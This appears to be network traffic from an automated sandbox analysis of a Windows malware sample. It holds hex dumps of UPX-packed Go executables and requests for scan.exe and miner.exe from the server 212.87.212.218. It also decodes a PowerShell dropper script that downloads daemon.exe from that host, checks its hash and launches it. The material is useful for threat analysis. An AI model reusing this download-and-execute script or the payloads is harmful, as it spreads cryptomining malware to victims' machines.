                                                                                                          Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 36 48 00 00 00 00 00 f0 00 22 02 0b 02 03 00 00 f0 19 00 00 10 00 00 00 50 35 00 30 48 4f 00 00 60 35 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 60 4f 00 00 10 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 4f 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 50 35 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 f0 19 00 00 60 35 00 00 ec 19 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 50 4f 00 00 02 00 00 00 ee 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 0a d6 60 ad 2e 1e 03 e8 59 00 2b 4f 00 0b e8 19 00 00 38 48 00 49 36 00 59 ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 36 58 35 57 6f 4f 41 32 56 64 79 73 53 41 39 4c ff ff ff ff 47 59 59 4a 2f 49 34 71 5a 6e 57 50 79 65 59 76 6b 68 63 7a 48 7a 31 41 35 2f 5f 75 34 36 32 49 ff ff ff ff 64 6e 66 33 53 49 61 39 58 37 2d 69 65 39 2f 73 4b 4d 59 55 4f 6a 42 66 5f 4a 76 4d 54 59 45 43 ff 0f 21 ff 47 79 52 22 0a 20 ff cc 49 3b 66 10 76 38 48 83 ec 18 48 ff 6f de fd 89 6c 24 10 48 8d 09 89 44 24 20 5c 24 28 66 90 e8 36 00 07 1c 48 8b de 99 ef 74 21 8b 1c 00 dc 53 83 c4 18 c3 a5 72 ab 54 08 10 4e 05 fd bc 08 df 3e ff 76 10 eb a7 c9 4c 8d 64 24 d8 4d 0f 86 74 06 e3 48 81 ec fc a4 bb b5 a8 82 00 64 ac 24 a0 0f 8d 89 84 24 b0 fb f6 76 fb eb 06 12 f0 4c 89 ae 85 db 0f 84 5e 03 3a 31 c9 e9 0c df fe ed 7e 04 ad 48 c7 c1 ff 00 2c c9 7d 0e 45 31 c0 31 f6 4c d9 eb 31 0f 1f e7 b6 bd b7 40 72 39 d9 0f 87 b2 da 94 71 01 18 f3 0f 82 f0 b7 ff f6 cf 48 29 cb 1e 7b ff 49 89 f8 48 f7 df 48 76 3f 48 21 fe 48 01 c6 d3 b5 ff 5f 66 f9 04 7c 9d 81 38 63 70 75 2e 75 95 31 d2 80 00 bd ca 35 3b f8 4b c2 89 74 24 70 4c a4 50 d0 36 8c fb b6 4b bb 32 02 e6 90 be ca c1 76 fa 04 b9 b1 b2 60 7b 90 66 7a fc f9 83 e7 04 22 1c 38 e8 70 fb be d0 52 01 4c 39 d1 45 a9 88 4c 24 48 2f 60 fe ff 77 2b 12 d1 32 59 ff 4c 16 18 4d 89 dc 49 f7 db 49 c1 fb 3f 4d 21 da 4e ff ff 41 d7 66 10 2b 58 28 03 75 0f 46 0f b7 14 10 66 41 81 fa 6f 6e 74 ed 2b cf ef 21 eb 66 28 04 75 60 2c fd 6f 66 75 53 18 b6 ca f3 ad fd 54 10 02 41 80 fa 16 47 66 fa 07 75 29 44 38 be a2 fd f6 61 6c 75 1c 3a 7c 38 02 40 80 ff 14 11 02 3d fd 09 47 00 7b 16 1c 18 4e bf 1c 21
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd6H"P50HO`5@`O` POUPX0P5UPX1`5@UPX2PO@3.96UPX!$`.Y+O8HI6Y Go build ID: "6X5WoOA2VdysSA9LGYYJ/I4qZnWPyeYvkhczHz1A5/_u462Idnf3SIa9X7-ie9/sKMYUOjBf_JvMTYEC!GyR" I;fv8HHol$HD$ \$(f6Ht!SrTN>vLd$MtHd$$vL^:1~H,}E11L1@r9qH){IHHv?H!H_f|8cpu.u15;Kt$pLP6K2v`{fz"8pRL9EL$H/`w+2YLMII?M!NAf+X(uFfAont+!f(u`,ofuSTAGfu)D8alu:|8@=G{N!
                                                                                                          Aug 13, 2022 09:06:58.920624018 CEST3038INData Raw: 48 40 2a d7 c0 6e 67 15 e7 16 54 24 38 34 ef eb 3e 16 7f c1 15 6e 03 67 3c 7e 05 61 50 27 00 bb 10 04 df ab b4 f8 20 70 3c 91 58 18 1d 3e 0a d2 90 ca 80 3c 20 60 48 1e 2e c8 73 ca 0e 02 ab 1a a8 3c 38 1d 9d 8b 08 01 0c 20 01 79 87 f5 61 68 e7 9b
                                                                                                          Data Ascii: H@*ngT$84>ng<~aP' p<X>< `H.s<8 yah!F h v{e;~P(t; xA$CH[x$VtyH>t ur.Hp$s<p@]`z8u<d
                                                                                                          Aug 13, 2022 09:06:58.920655012 CEST3040INData Raw: d1 ea 08 c1 76 ec 53 41 10 13 20 9e 04 11 32 0f 87 38 70 e0 7f c3 ff 0f f8 46 48 ef 0d 67 2a 40 09 4d 89 7c 24 68 28 78 fb e2 31 d2 45 4a 17 4d 8d 9c 44 69 d2 93 d2 01 f8 26 fc d5 52 1c 07 43 8d 14 13 4d 86 39 c6 7f e4 49 54 5c c1 6d 32 41 b9 33
                                                                                                          Data Ascii: vSA 28pFHg*@M|$h(x1EJMDi&RCM9IT\m2A3+Eln+RE"01L^EiD,0G<\,LI9~w`.#zh81`7D$jYA9uDlD%Z,^X`L.8D d23@H CkZ
                                                                                                          Aug 13, 2022 09:06:58.920686007 CEST3041INData Raw: 34 e6 1f 04 20 44 90 c0 e2 41 ba af 03 c9 06 43 97 bb 54 0d 7f 43 17 9e 14 e0 c5 74 05 3e 1d dc 50 74 8a 44 c5 f5 72 01 4e 4c 8d 44 15 bc 7f 97 f7 97 62 3a 59 18 79 12 40 47 61 4a ab 6c a6 e8 61 68 25 4d 95 67 e5 7d 06 56 10 08 5f 66 20 6f 76 e7
                                                                                                          Data Ascii: 4 DACTCt>PtDrNLDb:Yy@GaJlah%Mg}V_f ovyF<v[W@t*r=V_tw[htyMuRzo9tsj$\k7HH\H)uO=YTC?ZA
                                                                                                          Aug 13, 2022 09:06:58.920717001 CEST3043INData Raw: 5c b2 6a 57 f0 d6 83 7e 0f 69 22 63 20 1c 4b da 28 bc ac 39 ad 39 74 10 68 0a 08 71 06 1f 01 7a 09 23 3d 40 db 23 49 1b 6d a9 60 1c e3 f1 21 81 2b 24 73 27 02 ed 95 e3 a3 31 cc 73 23 27 8e ad 72 6d 47 61 d4 3a 73 18 c1 85 8e c0 c8 04 38 11 74 69
                                                                                                          Data Ascii: \jW~i"c K(99thqz#=@#Im`!+$s'1s#'rmGa:s8tiBk0@^~KTsXA{G+<t0#qT8;w^8J@(BXZup> HSw;L]jxwA$+:*%BVh8?@{>f9A;>VC8C
                                                                                                          Aug 13, 2022 09:06:58.920809031 CEST3044INData Raw: 1e 85 83 c9 04 c1 06 47 9a 7a 0a bb ba 10 00 83 9d 58 9f b9 ed 15 10 8d 54 0e ff d6 c3 e1 f6 c1 04 74 5d ed 3d f6 1e 83 e1 fb 6d 8b 94 93 0e 02 60 d0 64 40 9a 6f 45 02 74 1d fd b0 17 ae f9 58 43 01 74 0c fe 3b d0 06 a9 c0 48 a7 bc 45 c0 c8 2e c3
                                                                                                          Data Ascii: GzXTt]=m`d@oEtXCt;HE..Y>6#WWt`?*lf MuhB+>5</LM9,$u8*$$1`n3!J2 .8Sh5Qc38|yw~5sNyQ
                                                                                                          Aug 13, 2022 09:06:58.920900106 CEST3045INData Raw: 4b 41 c0 db d7 8b 81 31 e0 eb 63 8b fc eb 90 51 a0 03 01 59 b4 50 b2 ff a9 2c c0 67 18 40 2b 12 ec 78 70 c0 af 85 52 70 fe dd 74 86 c0 94 34 25 65 36 df 43 c0 3c e8 11 75 0f 58 80 b9 4e 72 42 60 3f ad 27 3f 8b 7e 39 24 07 70 86 2d 54 47 7b 70 5c
                                                                                                          Data Ascii: KA1cQYP,g@+xpRpt4%e6C<uXNrB`?'?~9$p-TG{p\>ptx.EuHF<zh~=L[h`"Kp94i^TkIM)V<XD^>>&47C&8:XMeJCsj&>v<t50kPV
                                                                                                          Aug 13, 2022 09:06:58.920933962 CEST3047INData Raw: 37 8a 34 e7 f7 1d 70 be d1 f6 7a d8 4c d9 c6 46 be 03 91 2c 08 21 3f 56 49 3c 07 2a 70 a2 d7 83 79 1c 11 b8 8d 70 92 66 7b 58 19 06 54 03 ef f2 7c df c0 13 2d 17 46 66 66 1b 06 27 2c 08 4b 7e 4e 45 08 72 f9 62 d4 53 bd 21 71 40 0b 31 88 11 57 14
                                                                                                          Data Ascii: 74pzLF,!?VI<*pypf{XT|-Fff',K~NErbS!q@1W'9B2jJnAX/(?J6St{DBf@TJ|b|J;).Gk*8BI"fw}dJyU{uO)A5yA(+A(cZYJ>y{q\
                                                                                                          Aug 13, 2022 09:06:58.920964003 CEST3048INData Raw: 14 59 4b ff 96 5c 90 ad e4 19 69 7a 25 70 94 70 78 f2 49 19 39 98 70 9a 56 fc 2d 59 a1 05 c6 82 58 ac 0a 25 0a 85 7b 51 68 69 49 ff 4f 7f 71 71 e3 41 58 98 07 7c 78 84 cb 95 4a 74 40 d1 2b 19 23 9c 81 7f 57 e1 a2 ae 05 43 bd ff 4a fc 23 3d f8 37
                                                                                                          Data Ascii: YK\iz%ppxI9pV-YX%{QhiIOqqAX|xJt@+#WCJ#=7<CP0D52@Is&p&Mc7@K#CTK0HY0o0B(xE!2ceCTZG +s @@@ X)f@(098D?9@;%_qLqTi+v
                                                                                                          Aug 13, 2022 09:06:58.920994043 CEST3050INData Raw: 4a 06 00 57 44 df 19 e4 92 84 06 18 a1 01 d6 19 19 47 15 7f 73 01 c9 63 44 58 5e 26 28 d1 a9 0a 5b 22 59 1d d9 c3 45 37 04 e2 bf 4d bf 60 d7 37 12 be 80 9c 75 2c ac 56 68 d1 23 20 43 7c 5e 2d 86 04 d3 91 1e 24 f3 79 9c 98 0e b4 06 a6 3f 68 95 56
                                                                                                          Data Ascii: JWDGscDX^&(["YE7M`7u,Vh# C|^-$y?hVN|Hx!5qwMHQx-o/7uR2"}C22$l>!C22$!C2+99$!KDcL+BD"dH@d*UD?r$H89ylC>!+@@Dy
                                                                                                          Aug 13, 2022 09:06:58.938194990 CEST3051INData Raw: 20 d7 e3 46 ea 03 24 92 49 d1 e4 4c 29 37 a2 0e df 1a 83 fe 14 72 b0 35 2e 87 27 78 0b 6c 27 3f 73 21 c9 7a d5 48 29 f2 d8 b6 1e 8d a0 14 c1 58 34 7e ec cc fb 49 c1 6b 17 1a 5c 4c 21 fe 1a bc 49 7f bc d4 ab c3 9b 3f 47 70 54 86 b3 c9 21 2c 4e 20
                                                                                                          Data Ascii: F$IL)7r5.'xl'?s!zH)X4~Ik\L!I?GpT!,N ;\LMVRHKqB(Xb1!UC97Gq"</I.pXM)0|tttgJ\0lD(Z!(y%D]@'/


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          33192.168.2.749762212.87.212.21880C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:07:03.847393990 CEST4821OUTGET /doanlowd.txt HTTP/1.1
                                                                                                          Host: 212.87.212.218
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          34212.87.212.21880192.168.2.749762C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:07:03.866240025 CEST4822INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sat, 13 Aug 2022 07:07:03 GMT
                                                                                                          Content-Type: text/plain
                                                                                                          Content-Length: 796
                                                                                                          Last-Modified: Mon, 08 Aug 2022 02:12:37 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "62f07115-31c"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 24 69 73 45 78 69 73 74 3d 54 65 73 74 2d 50 61 74 68 20 2d 50 61 74 68 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 22 20 2d 50 61 74 68 54 79 70 65 20 4c 65 61 66 0d 0a 69 66 28 24 69 73 45 78 69 73 74 20 2d 6e 65 20 24 74 72 75 65 29 7b 0d 0a 09 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 46 69 6c 65 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2c 20 64 6f 77 6e 6c 6f 61 64 20 61 67 61 69 6e 20 20 20 20 22 0d 0a 20 20 20 20 28 6e 65 77 2d 6f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 32 31 32 2e 38 37 2e 32 31 32 2e 32 31 38 2f 64 61 65 6d 6f 6e 2e 65 78 65 27 2c 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 27 29 0d 0a 7d 0d 0a 24 66 69 6c 65 68 61 73 68 3d 47 65 74 2d 46 69 6c 65 48 61 73 68 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 20 2d 41 6c 67 6f 72 69 74 68 6d 20 4d 44 35 0d 0a 69 66 28 24 46 69 6c 65 48 61 73 68 2e 48 61 73 68 20 2d 6e 65 20 22 43 34 34 43 36 37 46 42 42 44 37 38 41 46 34 34 45 34 45 37 35 37 38 37 45 36 33 36 45 31 46 45 22 29 7b 0d 0a 09 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 68 61 73 68 20 65 72 72 6f 72 2c 20 64 6f 77 6e 6c 6f 61 64 20 61 67 61 69 6e 22 0d 0a 20 20 20 20 28 6e 65 77 2d 6f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 32 31 32 2e 38 37 2e 32 31 32 2e 32 31 38 2f 64 61 65 6d 6f 6e 2e 65 78 65 27 2c 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 27 29 0d 0a 7d 0d 0a 24 61 3d 47 65 74 2d 50 72 6f 63 65 73 73 0d 0a 24 62 3d 4f 75 74 2d 53 74 72 69 6e 67 20 2d 49 6e 70 75 74 4f 62 6a 65 63 74 20 24 61 2e 70 61 74 68 0d 0a 69 66 28 24 62 2e 63 6f 6e 74 61 69 6e 73 28 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 22 29 20 2d 6e 65 20 24 74 72 75 65 29 7b 0d 0a 09 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 50 72 6f 63 65 73 73 20 6e 6f 74 20 73 74 61 72 74 65 64 2c 20 73 74 61 72 74 20 70 72 6f 63 65 73 73 22 0d 0a 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 43 3a 5c 57 69 6e 64 6f 77 73 5c 54 65 6d 70 5c 64 61 65 6d 6f 6e 2e 65 78 65 22 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 7d
                                                                                                          Data Ascii: $isExist=Test-Path -Path "C:\Windows\Temp\daemon.exe" -PathType Leafif($isExist -ne $true){Write-Output "File does not exist, download again " (new-object System.Net.WebClient).DownloadFile('http://212.87.212.218/daemon.exe','C:\Windows\Temp\daemon.exe')}$filehash=Get-FileHash C:\Windows\Temp\daemon.exe -Algorithm MD5if($FileHash.Hash -ne "C44C67FBBD78AF44E4E75787E636E1FE"){Write-Output "hash error, download again" (new-object System.Net.WebClient).DownloadFile('http://212.87.212.218/daemon.exe','C:\Windows\Temp\daemon.exe')}$a=Get-Process$b=Out-String -InputObject $a.pathif($b.contains("C:\Windows\Temp\daemon.exe") -ne $true){Write-Output "Process not started, start process" Start-Process -FilePath "C:\Windows\Temp\daemon.exe" -NoNewWindow}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          35192.168.2.749764212.87.212.21880C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:07:05.050214052 CEST4823OUTGET /rar/d06ed635-68f6-4e9a-955c-4899f5f57b9a:ZIARU67GX6SIHMGGTFEQWXLIAQXP3BH2RIYWTAXNR2AYP4GMLN2IUBNP47H3RXLIM55O627ZFLTQUTLMGXQMS3XLRLHN4XZPUVGB5YMOPVXWHR6NQUHQZIWOKP44Y42KDNTXJNLISXS3QAZDUUBRPQXWOJF4VPYDBHKWPUKGXA7JWBUKYUMLY77ZZHUKFRKFTLEJ3ZOEG6E6C=== HTTP/1.1
                                                                                                          Host: 212.87.212.218
                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                          Accept-Encoding: gzip
                                                                                                          Aug 13, 2022 09:07:35.218192101 CEST10052OUTData Raw: 00
                                                                                                          Data Ascii:
                                                                                                          Aug 13, 2022 09:08:05.422517061 CEST12642OUTData Raw: 00
                                                                                                          Data Ascii:
                                                                                                          Aug 13, 2022 09:08:40.120511055 CEST12663OUTData Raw: 00
                                                                                                          Data Ascii:
                                                                                                          Aug 13, 2022 09:09:10.215104103 CEST12678OUTData Raw: 00
                                                                                                          Data Ascii:
                                                                                                          Aug 13, 2022 09:09:40.319237947 CEST12678OUTData Raw: 00
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          36212.87.212.21880192.168.2.749764C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:07:05.067631960 CEST4823INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sat, 13 Aug 2022 07:07:05 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          Content-Encoding: gzip
                                                                                                          Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          37192.168.2.749773212.87.212.21880C:\Windows\Temp\scan.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:07:15.819555998 CEST4954OUTGET /scan.exe HTTP/1.1
                                                                                                          Host: 212.87.212.218
                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                          Accept-Encoding: gzip
                                                                                                          Aug 13, 2022 09:07:43.992064953 CEST10061OUTGET /miner.exe HTTP/1.1
                                                                                                          Host: 212.87.212.218
                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                          Accept-Encoding: gzip
                                                                                                          Aug 13, 2022 09:08:14.823518038 CEST12649OUTData Raw: 00
                                                                                                          Data Ascii:
                                                                                                          Aug 13, 2022 09:08:44.933593035 CEST12663OUTData Raw: 00
                                                                                                          Data Ascii:


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          38212.87.212.21880192.168.2.749773C:\Users\user\Desktop\jxatBamQnK.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Aug 13, 2022 09:07:15.837460995 CEST4955INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Sat, 13 Aug 2022 07:07:15 GMT
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Length: 4741120
                                                                                                          Last-Modified: Mon, 08 Aug 2022 02:00:25 GMT
                                                                                                          Connection: keep-alive
                                                                                                          ETag: "62f06e39-485800"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 98 dd 00 00 00 00 00 f0 00 22 02 0b 02 03 00 00 60 48 00 00 10 00 00 00 10 9e 00 d0 71 e6 00 00 20 9e 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 90 e6 00 00 10 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 e6 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 10 9e 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 60 48 00 00 20 9e 00 00 54 48 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 80 e6 00 00 02 00 00 00 56 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 33 2e 39 36 00 55 50 58 21 0d 24 08 0a 92 ba 51 92 a1 d9 9d 4a b5 5c e6 00 a6 51 48 00 00 9a dd 00 00 00 00 ad ff ff ff ff ff 20 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 4b 49 38 4b 70 79 38 41 6c 38 6c 55 58 42 73 45 ff ff ff ff 52 46 53 39 2f 74 7a 4b 5a 5a 49 4e 68 48 64 7a 62 51 43 52 67 54 75 49 66 2f 63 74 53 45 46 78 bf fd ff ff 61 42 6c 4f 4a 44 67 64 4a 6d 2d 36 47 51 2f 34 77 6d 71 67 71 77 76 50 66 56 54 42 75 ff 87 d8 ff 67 56 57 6d 30 22 0a 20 ff cc 01 49 3b 66 10 76 38 48 83 ec 18 ff 37 ef fe 48 89 6c 24 10 48 8d 09 89 44 24 20 5c 24 28 66 90 e8 7b 06 00 00 48 79 e7 7e ba 8b 21 8b e8 2c 00 1d 53 83 c4 18 c3 5d f9 be 52 08 10 e8 d3 13 06 4f 08 10 eb a7 dd ef cf bf c9 4c 8d 64 24 d8 4d 0f 86 f8 05 74 81 ec a8 83 89 ed f3 93 ee ac 24 a0 0f 8d 89 84 24 b0 eb 06 12 f0 f7 fb f6 db 4c 89 ae 85 db 0f 84 1f 02 20 31 c9 e9 8b 03 3e c7 c1 ff 00 be fd f6 6f 2c c9 7d 0e 45 31 c0 31 f6 4c d9 eb 31 0f 1f 40 32 39 d9 0f 87 95 df 56 de ee b3 8d 71 01 18 f3 0f 82 7d 29 cb 1e 7b ff 49 89 f8 ff 0b fe f6 48 f7 df 48 76 3f 48 21 fe 48 01 c6 66 f9 04 7c 9d 81 38 63 70 75 2e f0 97 ef f6 75 95 31 d2 80 00 e9 49 bd c2 89 74 24 70 4c 9a d6 6e 76 a4 50 d0 36 8c 4b 01 32 90 be ca 1c 90 f6 6b 57 83 fa 04 b8 02 d3 7a fc b2 f9 d9 be 60 7b 83 e7 04 22 1c 38 d0 52 01 4c 39 d1 44 d7 04 5b 41 87 9b 88 4c 24 48 2f 60 12 d1 32 59 ff ba f6 ff bf 4c 16 18 4d 89 dc 49 f7 db 49 c1 fb 3f 4d 21 da 4e 66 10 2b 58 7e ff ff 0f 28 03 75 0f 46 0f b7 14 10 66 41 81 fa 6f 6e 74 21 eb 66 28 04 75 60 ed 6f 5f 79 2c fd 6f 66 75 53 18 b6 54 10 02 41 80 fa 16 47 b7 57 9e 6f 66 fa 07 75 29 44 38 61 6c 75 1c 3a 7c 38 02 a0 e1 15 ed 40 80 ff 14 11 02 3d fd 2d d9 76 c0 3b db 81 d2 bf c0
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"`Hq @` UPX0UPX1`H TH@UPX2VH@3.96UPX!$QJ\QH Go build ID: "KI8Kpy8Al8lUXBsERFS9/tzKZZINhHdzbQCRgTuIf/ctSEFxaBlOJDgdJm-6GQ/4wmqgqwvPfVTBugVWm0" I;fv8H7Hl$HD$ \$(f{Hy~!,S]ROLd$Mt$$L 1>o,}E11L1@29Vq}){IHHv?H!Hf|8cpu.u1It$pLnvP6K2kWz`{"8RL9D[AL$H/`2YLMII?M!Nf+X~(uFfAont!f(u`o_y,ofuSTAGWofu)D8alu:|8@=-v;
                                                                                                          Aug 13, 2022 09:07:15.837486029 CEST4957INData Raw: 1c 40 2a 15 e7 16 83 bf c3 76 54 24 38 34 e9 72 ba 3e e8 bb 70 03 a2 e5 c5 2f fe 05 b8 f6 6c 00 bb 10 04 e8 aa 79 03 91 58 49 a5 f9 7b 18 e8 9b 79 3f 17 e6 6d 20 8a 4a f3 e4 ca 60 48 e8 7b 49 6c 02 a7 43 a5 99 6a aa e5 8b 9d 8b ec e6 d1 e1 e9 26
                                                                                                          Data Ascii: @*vT$84r>p/lyXI{y?m J`H{IlCj&LhGWN*!6h 'He#HY`N+~P(M ?v:A$'CH[GwCx$VtyH>et urHp$eoh{;#+Txp>Exd3
                                                                                                          Aug 13, 2022 09:07:15.837511063 CEST4958INData Raw: ba 48 21 07 06 c3 79 ff 31 82 85 3c 3f 6f 1b 9d 09 4d 77 f6 13 eb 10 4a 42 2d 8b f6 c2 1d 38 c4 0f 7d 2b da 30 dc 0f 36 ed c1 e1 05 38 34 01 d9 75 cb e8 0a dc 3c a6 c0 1c 74 c8 39 b8 74 10 ac 1a 10 57 7e 9b 07 59 9b 0b 16 72 6c a2 c1 48 d1 ba 55
                                                                                                          Data Ascii: H!y1<?oMwJB-8}+0684u<t9tW~YrlHUloH!2;hm3.3nknh,l>eA 2pCHG@M/|$h1EJMDio_RCM9I2A3+"EE^E"01M
                                                                                                          Aug 13, 2022 09:07:15.837534904 CEST4960INData Raw: 1e e9 af c0 70 c0 4e fb 10 7c 6e 49 c7 c4 7d f7 f0 87 d3 f5 1e 20 c0 c8 e2 1e f0 eb 17 7f 74 6d d7 dd d1 16 b8 d2 ce d4 99 39 c7 5d 03 d0 da 76 e4 10 e3 32 2d 5c 10 5f 29 6b 8f 06 c0 d9 49 b2 60 d3 fa 04 e2 70 00 be 3d c8 08 4c 21 d2 77 4d 89 20
                                                                                                          Data Ascii: pN|nI} tm9]v2-\_)kI`p=L!wM v}t1Zf@/omh&pbHD6&L^oW=,V+\}xbtB L9~t:Grp4 $8A.TChttCj*ZN%(AreH ;_
